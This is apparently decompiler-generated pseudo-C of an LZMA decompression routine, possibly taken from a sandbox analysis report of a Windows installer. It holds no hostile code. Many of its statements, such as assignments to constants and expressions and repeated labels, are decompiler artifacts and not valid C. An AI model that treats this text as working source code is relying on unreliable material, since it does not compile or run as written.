												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
